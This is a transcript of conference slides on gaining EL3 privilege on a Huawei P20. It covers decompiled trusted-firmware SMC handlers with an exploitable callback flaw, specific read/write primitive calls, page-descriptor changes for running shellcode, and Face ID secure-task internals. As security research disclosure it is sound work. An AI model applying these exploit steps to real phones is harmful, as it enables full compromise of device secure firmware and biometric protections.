Upgrade to Pro — share decks privately, control downloads, hide ads and more …

EL3 Tour: Get the Ultimate Privilege of Android...

hhj4ck
May 03, 2019

EL3 Tour: Get the Ultimate Privilege of Android Phone

Slides for INFILTRATE 2019

hhj4ck

May 03, 2019
Tweet

More Decks by hhj4ck

Other Decks in Technology

Transcript

  1. Bio ✤ Senior Security Researcher at Pangu ✤ Exploitation and

    Reversing Engineering ✤ Recently ✤ Firmware, Bootloader, Kernel ✤ Previously ✤ Adobe Flash
  2. Agenda ✤ ARMv8 Privilege mode ✤ Post-startup architecture of Huawei

    P20 ✤ Hunt EL3 Vulnerabilities ✤ Execute shellcode in EL3 ✤ Face ID Bypass
  3. ARMv8 Privilege Mode Linux Kernel Hypervisor Trusted Firmware (No limits:

    Physical Memory, TTBR0_ELx, VBAR_ELx, …) Trusted Kernel Application Framework Libraries Services Trusted App EL0 EL1 EL2 EL3 Normal World Secure World
  4. Huawei P20 ✤ ARMv8 (Hisilicon Kirin 970) ✤ Android phone

    with great cameras ✤ Customized EL3 and S-EL0 & 1
  5. Boot Chain Trusted Firmware Linux Kernel EL3 Trusted Core Kernel

    S-EL1 globaltask task_xxx S-EL0 EL1 /sbin/teecd APK EL0
  6. Interact with Secure World Trusted Firmware Linux Kernel EL3 Trusted

    Core Kernel S-EL1 globaltask task_xxx S-EL0 EL1 /sbin/teecd APK EL0 Normal World Secure World svc
  7. Interact with Secure World Trusted Firmware Linux Kernel EL3 Trusted

    Core Kernel S-EL1 globaltask task_xxx S-EL0 EL1 /sbin/teecd APK EL0 Normal World Secure World smc
  8. Interact with Secure World Trusted Firmware Linux Kernel EL3 Trusted

    Core Kernel S-EL1 globaltask task_xxx S-EL0 EL1 /sbin/teecd APK EL0 Normal World Secure World
  9. Interact with Secure World Trusted Firmware Linux Kernel EL3 Trusted

    Core Kernel S-EL1 globaltask task_xxx S-EL0 EL1 /sbin/teecd APK EL0 Normal World Secure World IPC
  10. ARM Trusted Firmware ✤ https://github.com/ARM-software/arm-trusted-firmware ✤ Switch between Secure and

    Normal World ✤ Physical Memory Partition ✤ Save & Load: TTBR1_EL1, SCTLR_EL1, TCR_EL1, … ✤ Dispatch smc
  11. ARM Trusted Firmware (ATF) ✤ Switch between Secure and Normal

    World ✤ Physical Memory Partition ✤ Switch between Secure and Normal World ✤ Save & Load: TTBR1_EL1, SCTLR_EL1, TCR_EL1, … ✤ Dispatch SMC ✤ Trusted Core handles most of smc calls, where EL3 handles the rest
  12. Running Environment of EL3 ✤ SCTLR_EL3.WXN = 1 ✤ No-ASLR

    ✤ No-CFI ✤ SCTLR_EL3.M = 1 ✤ TTBR0_EL3 ✤ Flat Mapping
  13. Memory Layout of EL3 Start End Usage Permission 0x16800000 0x1CE00000

    R | W 0x1CE00000 0x1FE00000 Trusted Core R | W 0x1FE00000 0x1FE2A000 ATF CODE R | E 0x1FE2A000 0x20000000 ATF DATA R | W 0x209E1000 0x209F8000 ??? R | W 0x5A000000 0xFFFDF000 MMIO R | W FASTBOOT
  14. EL1 Kernel as a Start Point ✤ Root Exploit ✤

    Purchase an unlock code ✤ Unlock the Bootloader ✤ fastboot flash kernel kernel.img
  15. ✤ Looking for smc usages EL1 Kernel as a Start

    Point #define RPMB_SVC_REQUEST_ADDR 0xC600FF04 #define HISI_SUB_RESERVED_BL31_SHARE_MEM_PHYMEM_BASE 0x209E1000 static int hisi_rpmb_device_init(void) { ...skip... bl31_smem_base = HISI_SUB_RESERVED_BL31_SHARE_MEM_PHYMEM_BASE; rpmb_request_phy = bl31_smem_base + data[0]; atfd_hisi_rpmb_smc(RPMB_SVC_REQUEST_ADDR, rpmb_request_phy, rpmb_support_device, 0); ...skip... }
  16. ✤ Search for SMC usages int atfd_hisi_rpmb_smc(u64 function_id, u64 arg0,

    u64 arg1, u64 arg2) { asm volatile( __asmeq("%0", "x0") __asmeq("%1", "x1") __asmeq("%2", "x2") __asmeq("%3", "x3") "smc #0\n" : "+r" (function_id) : "r" (arg0), "r" (arg1), "r" (arg2)); return (int)function_id; } EL1 Kernel as a Start Point
  17. ✤ Looking for smc usages #define RPMB_SVC_REQUEST_ADDR 0xC600FF04 #define HISI_SUB_RESERVED_BL31_SHARE_MEM_PHYMEM_BASE

    0x209E1000 static int hisi_rpmb_device_init(void) { ...skip... bl31_smem_base = HISI_SUB_RESERVED_BL31_SHARE_MEM_PHYMEM_BASE; rpmb_request_phy = bl31_smem_base + data[0]; atfd_hisi_rpmb_smc(RPMB_SVC_REQUEST_ADDR, rpmb_request_phy, rpmb_support_device, 0); ...skip... } EL1 Kernel as a Start Point
  18. if (x0 == 0xC600FF04) { if ((rpmb_request_phy = x1) !=

    0x209E9000) { NOTICE(“sync kernel and bl31 for a same memory space failed\n”); goto err; } } 0xC600FF04 Handler
  19. 0xC600FF06 Handler if ( x0 == 0xC600FF06 ) { v31

    = rpmb_request_phy + 0x6000; if ( a2 ) { NOTICE("rpmb error: the result from kernel is error,%lx\n", a2); v32 = *(v31 + 0xC38); v33 = x1; if ( !v32) return NOTICE("rpmb request callback function is NULL\n"); return v32(v33); } }
  20. 0xC600FF06 Handler if ( x0 == 0xC600FF06 ) { v31

    = rpmb_request_phy + 0x6000; if ( a2 ) { NOTICE("rpmb error: the result from kernel is error,%lx\n", a2); v32 = *(v31 + 0xC38); v33 = x1; if ( !v32) return NOTICE("rpmb request callback function is NULL\n"); return v32(v33); } }
  21. 0xC600FF06 Handler if ( x0 == 0xC600FF06 ) { v31

    = rpmb_request_phy + 0x6000; if ( a2 ) { NOTICE("rpmb error: the result from kernel is error,%lx\n", a2); v32 = *(v31 + 0xC38); v33 = x1; if ( !v32) return NOTICE("rpmb request callback function is NULL\n"); return v32(v33); //Both PC and x0 are controlled !!! } }
  22. 0xC600FF04 Handler History if (x0 == 0xC600FF04) { if ((rpmb_request_phy

    = x1) != 0x209E9000) { ... } } ~2018.3 ~2018.7 Ancient 2018.5
  23. 0xC600FF04 Handler History if (x0 == 0xC600FF04) { if (x1

    != 0x209E9000) { ... } } ~2018.3 ~2018.7 Ancient Contemporary
  24. 0xC600FF06 Handler History if ( x0 == 0xC600FF06 ) {

    v31 = rpmb_request_phy + 0x6000; if ( a2 ) { NOTICE("rpmb error: the result from kernel is error,%lx\n", a2); v32 = *(v31 + 0xC38); v33 = x1; if ( !v32) return NOTICE("rpmb request callback function is NULL\n"); return v32(v33); } } ~2018.7 Ancient
  25. 0xC600FF06 Handler History if ( x0 == 0xC600FF06 ) {

    v31 = rpmb_request_phy + 0x6000; //0x209E0000 is accessible to EL1 if ( a2 ) { NOTICE("rpmb error: the result from kernel is error,%lx\n", a2); v32 = *(v31 + 0xC38); v33 = x1; if ( !v32) return NOTICE("rpmb request callback function is NULL\n"); return v32(v33); } } ~2018.7 Ancient
  26. 0xC600FF06 Handler History if ( x0 == 0xC600FF06 ) {

    v31 = callback_vtable; //inaccessible to EL1 if ( a2 ) { NOTICE("rpmb error: the result from kernel is error,%lx\n", a2); v32 = *(v31); v33 = x1; if ( !v32) return NOTICE("rpmb request callback function is NULL\n"); return v32(v33); } } Contemporary ~2018.7 Ancient
  27. Control the PC and X0 ✤ Kernel module as smc

    wrapper ✤ insmod exploit.ko ✤ smc(0xC600FF04, func_pa) ✤ smc(0xC600FF06, param)
  28. Control the PC and X0 ✤ Kernel module as smc

    wrapper ✤ insmod exploit.ko ✤ Tamper [0x209E9000 + 0x6C38] ✤ smc(0xC600FF06, param)
  29. Write Primitive - Step 1 global_addr = controlled global_len =

    0x209xxxxx x0 = controlled x1 = 0x209xxxxx x2 = 0x1FExxxxx
  30. Write Primitive - Step 2 global_addr = controlled, global_len =

    0x209xxxxx, x0 = controlled, x2 = 0x1FExxxxx
  31. x0 = controlled, x2 = 0x1FExxxxx Write Primitive - Step

    2 global_addr = controlled, global_len = 0x209xxxxx,
  32. x0 = controlled, x2 = 0x1FExxxxx Write Primitive - Step

    2 global_addr = controlled, global_len = 0x209xxxxx,
  33. x0 = controlled, x2 = 0x1FExxxxx Write Primitive - Step

    2 global_addr = controlled, global_len = 0x209xxxxx,
  34. R & W Primitives ✤ Memory Read ✤ smc(0xC500AA01, addr

    - 0x18, 0, 0x55BBCCE0 + 1); ✤ Memory Write ✤ smc(0xC500AA01, addr - 8, value, 0x55BBCCE0 + 2);
  35. EL3 Memory Layout Start End Usage Permission 0x16800000 0x1CE00000 FASTBOOT

    R | W 0x1CE00000 0x1FE00000 Trusted Core R | W 0x1FE00000 0x1FE2A000 ATF CODE R | E 0x1FE2A000 0x20000000 ATF DATA R | W 0x209E1000 0x209F8000 Shared Memory R | W 0x5A000000 0xFFFDF000 MMIO R | W
  36. EL3 Memory Layout Start End Usage Permission 0x16800000 0x1CE00000 FASTBOOT

    R | W 0x1CE00000 0x1FE00000 Trusted Core R | W 0x1FE00000 0x1FE2A000 ATF CODE R | E 0x1FE2A000 0x20000000 ATF DATA R | W 0x209E1000 0x209F8000 Shellcode R | W 0x5A000000 0xFFFDF000 MMIO R | W
  37. Page Descriptor 627 0|1|1 0|0 0|1|0 0 1 1 1

    nG AF SH[1:0] AP[2:1] NS AttrIndx[2:0]
  38. Page Descriptor 627 0|1|1 0|0 0|1|0 0 1 1 1

    nG AF SH[1:0] AP[2:1] NS AttrIndx[2:0]
  39. Page Descriptor 627 0|1|1 0|1 0|0|0 0 1 1 1

    nG AF SH[1:0] AP[2:1] NS AttrIndx[2:0]
  40. Execute Shellcode ✤ Deploy Shellcode at 0x209F8000 ✤ Page Descriptior

    Modification: 0x209F8627 => 0x209F8783 ✤ TLBI ALLEL3 ✤ Invoke 0x209F8000
  41. We are in EL3 ✤ Do whatever you want ✤

    Check all those encrypted modules ✤ Modify and debug every peripheral ✤ Nothing is hidden from you anymore
  42. EL3 Memory Layout Start End Usage Permission 0x16800000 0x1CE00000 FASTBOOT

    R | W 0x1CE00000 0x1FE00000 Trusted Core R | W 0x1FE00000 0x1FE2A000 ATF CODE R | E 0x1FE2A000 0x20000000 ATF DATA R | W 0x209E1000 0x209F8000 Shellcode R | W 0x5A000000 0xFFFDF000 MMIO R | W
  43. Secure Task of Face ID Trusted Core Kernel globaltask task_keymaster

    task_gatekeeper /odm/ta/xxx.sec Normal World Secure World
  44. Secure Task of Face ID Trusted Core Kernel globaltask task_keymaster

    task_gatekeeper /odm/ta/xxx.sec Normal World Secure World
  45. Secure Task of Face ID Trusted Core Kernel globaltask task_keymaster

    task_gatekeeper task_xxx Normal World Secure World
  46. Secure Task of Face ID ✤ Dynamic Loaded Trusted Application

    ✤ /odm/ta/e8014913-e501-4d44-a9d6-058ec3b93b90.sec ✤ TEE_SERVICE_FACE_REC ✤ Search and extract it from physical memory
  47. Detection Logic of Face ID ✤ Calculate scores as results

    of image comparison ✤ secure task covers the entire logic ✤ Liveness detection ✤ Multiple methods (Both secure task and NS-EL0 are involved)